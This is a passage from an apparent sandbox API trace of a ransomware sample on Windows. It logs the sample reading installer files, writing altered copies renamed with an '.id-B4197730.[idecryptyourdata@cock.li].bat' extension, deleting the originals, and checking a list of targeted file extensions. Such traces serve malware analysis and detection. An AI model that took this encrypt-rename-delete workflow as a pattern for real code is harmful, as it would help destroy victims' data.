lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.119] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.119] SetEndOfFile (hFile=0x2d0) returned 1 [0047.119] CloseHandle (hObject=0x2d0) returned 1 [0047.120] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.120] SetEndOfFile (hFile=0x2d8) returned 1 [0047.121] CloseHandle (hObject=0x2d8) returned 1 [0047.121] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.122] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 1 [0047.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.122] lstrlenW (lpString=".doc") returned 4 [0047.122] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.122] lstrlenW (lpString=".docx") returned 5 [0047.122] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.122] lstrlenW (lpString=".pdf") returned 4 [0047.122] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.122] lstrlenW (lpString=".xls") returned 4 [0047.122] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.122] lstrlenW (lpString=".xlsx") returned 5 [0047.122] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.122] lstrlenW (lpString=".ppt") returned 4 [0047.122] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.122] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.122] lstrlenW (lpString=".zip") returned 4 [0047.122] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.122] lstrlenW (lpString=".rar") returned 4 [0047.122] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.122] lstrlenW (lpString=".bz2") returned 4 [0047.123] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString=".7z") returned 3 [0047.123] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.123] lstrlenW (lpString=".dbf") returned 4 [0047.123] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.123] lstrlenW (lpString=".1cd") returned 4 [0047.123] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.123] lstrlenW (lpString=".jpg") returned 4 [0047.123] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.123] lstrlenW (lpString=".doc") returned 4 [0047.123] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString=".docx") returned 5 [0047.123] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.123] lstrlenW (lpString=".pdf") returned 4 [0047.123] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString=".xls") returned 4 [0047.123] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.123] lstrlenW (lpString=".xlsx") returned 5 [0047.123] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.123] lstrlenW (lpString=".ppt") returned 4 [0047.123] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.123] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.123] lstrlenW (lpString=".zip") returned 4 [0047.123] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.124] lstrlenW (lpString=".rar") returned 4 [0047.124] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.124] lstrlenW (lpString=".bz2") returned 4 [0047.124] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.124] lstrlenW (lpString=".7z") returned 3 [0047.124] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.124] lstrlenW (lpString=".dbf") returned 4 [0047.124] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.124] lstrlenW (lpString=".1cd") returned 4 [0047.124] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 35 [0047.124] lstrlenW (lpString=".jpg") returned 4 [0047.124] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.124] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.124] lstrlenW (lpString="eula.rtf") returned 8 [0047.124] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.137] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3643) returned 1 [0047.137] CloseHandle (hObject=0x2c4) returned 1 [0047.137] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 0x80 [0047.137] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.137] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.137] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.138] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.138] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.140] GetLastError () returned 0x0 [0047.140] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xe3b, lpOverlapped=0x0) returned 1 [0047.229] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe40, lpOverlapped=0x0) returned 1 [0047.230] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.230] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.230] SetEndOfFile (hFile=0x2d8) returned 1 [0047.231] CloseHandle (hObject=0x2d8) returned 1 [0047.231] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.231] SetEndOfFile (hFile=0x2c4) returned 1 [0047.232] CloseHandle (hObject=0x2c4) returned 1 [0047.232] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.233] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 1 [0047.233] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.233] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.233] lstrlenW (lpString=".doc") returned 4 [0047.233] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.233] lstrlenW (lpString=".docx") returned 5 [0047.233] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.233] lstrlenW (lpString=".pdf") returned 4 [0047.233] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.233] lstrlenW (lpString=".xls") returned 4 [0047.233] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.233] lstrlenW (lpString=".xlsx") returned 5 [0047.233] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.233] lstrlenW (lpString=".ppt") returned 4 [0047.233] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.233] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.233] lstrlenW (lpString=".zip") returned 4 [0047.233] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.233] lstrlenW (lpString=".rar") returned 4 [0047.233] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.233] lstrlenW (lpString=".bz2") returned 4 [0047.234] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString=".7z") returned 3 [0047.234] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.234] lstrlenW (lpString=".dbf") returned 4 [0047.234] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.234] lstrlenW (lpString=".1cd") returned 4 [0047.234] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.234] lstrlenW (lpString=".jpg") returned 4 [0047.234] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.234] lstrlenW (lpString=".doc") returned 4 [0047.234] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString=".docx") returned 5 [0047.234] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.234] lstrlenW (lpString=".pdf") returned 4 [0047.234] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString=".xls") returned 4 [0047.234] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.234] lstrlenW (lpString=".xlsx") returned 5 [0047.234] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.234] lstrlenW (lpString=".ppt") returned 4 [0047.234] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.234] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.234] lstrlenW (lpString=".zip") returned 4 [0047.234] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.234] lstrlenW (lpString=".rar") returned 4 [0047.235] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.235] lstrlenW (lpString=".bz2") returned 4 [0047.235] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.235] lstrlenW (lpString=".7z") returned 3 [0047.235] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.235] lstrlenW (lpString=".dbf") returned 4 [0047.235] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.235] lstrlenW (lpString=".1cd") returned 4 [0047.235] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.235] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0047.235] lstrlenW (lpString=".jpg") returned 4 [0047.235] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.235] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.235] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.235] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.235] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=68226) returned 1 [0047.236] CloseHandle (hObject=0x2c4) returned 1 [0047.236] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 0x80 [0047.236] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.236] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.236] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.236] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.236] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.236] GetLastError () returned 0x0 [0047.236] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x10a82, lpOverlapped=0x0) returned 1 [0047.283] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x10a90, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x10a90, lpOverlapped=0x0) returned 1 [0047.285] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.285] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.285] SetEndOfFile (hFile=0x2d8) returned 1 [0047.285] CloseHandle (hObject=0x2d8) returned 1 [0047.287] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.287] SetEndOfFile (hFile=0x2c4) returned 1 [0047.289] CloseHandle (hObject=0x2c4) returned 1 [0047.289] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.289] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 1 [0047.289] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.290] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.290] lstrlenW (lpString=".doc") returned 4 [0047.290] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString=".docx") returned 5 [0047.290] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.290] lstrlenW (lpString=".pdf") returned 4 [0047.290] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString=".xls") returned 4 [0047.290] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString=".xlsx") returned 5 [0047.290] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.290] lstrlenW (lpString=".ppt") returned 4 [0047.290] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.290] lstrlenW (lpString=".zip") returned 4 [0047.290] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.290] lstrlenW (lpString=".rar") returned 4 [0047.290] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString=".bz2") returned 4 [0047.290] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString=".7z") returned 3 [0047.290] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.290] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.290] lstrlenW (lpString=".dbf") returned 4 [0047.290] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.290] lstrlenW (lpString=".1cd") returned 4 [0047.290] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.290] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.290] lstrlenW (lpString=".jpg") returned 4 [0047.291] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.291] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.291] lstrlenW (lpString=".doc") returned 4 [0047.291] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString=".docx") returned 5 [0047.291] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.291] lstrlenW (lpString=".pdf") returned 4 [0047.291] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString=".xls") returned 4 [0047.291] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString=".xlsx") returned 5 [0047.291] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.291] lstrlenW (lpString=".ppt") returned 4 [0047.291] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.291] lstrlenW (lpString=".zip") returned 4 [0047.291] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.291] lstrlenW (lpString=".rar") returned 4 [0047.291] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString=".bz2") returned 4 [0047.291] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.291] lstrlenW (lpString=".7z") returned 3 [0047.291] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.292] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.292] lstrlenW (lpString=".dbf") returned 4 [0047.292] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.292] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.292] lstrlenW (lpString=".1cd") returned 4 [0047.292] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.292] lstrlenW (lpString="C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned 44 [0047.292] lstrlenW (lpString=".jpg") returned 4 [0047.292] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.292] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.292] lstrlenW (lpString="eula.rtf") returned 8 [0047.292] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.292] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=12687) returned 1 [0047.292] CloseHandle (hObject=0x2c4) returned 1 [0047.292] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 0x80 [0047.293] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.293] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.293] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.293] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.293] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.293] GetLastError () returned 0x0 [0047.293] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x318f, lpOverlapped=0x0) returned 1 [0047.358] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x3190, lpOverlapped=0x0) returned 1 [0047.359] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.359] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.360] SetEndOfFile (hFile=0x2d8) returned 1 [0047.360] CloseHandle (hObject=0x2d8) returned 1 [0047.361] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.361] SetEndOfFile (hFile=0x2c4) returned 1 [0047.362] CloseHandle (hObject=0x2c4) returned 1 [0047.362] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.362] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 1 [0047.362] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.362] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.362] lstrlenW (lpString=".doc") returned 4 [0047.362] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.362] lstrlenW (lpString=".docx") returned 5 [0047.363] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.363] lstrlenW (lpString=".pdf") returned 4 [0047.363] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString=".xls") returned 4 [0047.363] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.363] lstrlenW (lpString=".xlsx") returned 5 [0047.363] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.363] lstrlenW (lpString=".ppt") returned 4 [0047.363] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.363] lstrlenW (lpString=".zip") returned 4 [0047.363] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.363] lstrlenW (lpString=".rar") returned 4 [0047.363] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString=".bz2") returned 4 [0047.363] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString=".7z") returned 3 [0047.363] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 